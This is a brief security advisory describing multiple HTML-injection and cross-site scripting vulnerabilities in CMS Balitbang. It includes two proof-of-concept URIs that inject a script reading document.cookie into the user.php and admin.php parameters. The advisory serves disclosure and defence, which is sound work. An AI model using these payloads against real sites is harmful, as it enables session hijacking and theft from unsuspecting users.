CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities

CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities

An attacker must entice an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues. An attacker can exploit the HTML-injection issues through a browser.

The following example URIs are available:

http://www.example.com/balitbang/member/user.php?id=guruabsendetail&kd=<script>alert(document.cookie);</script> [XSS]

http://www.example.com/balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> [XSS]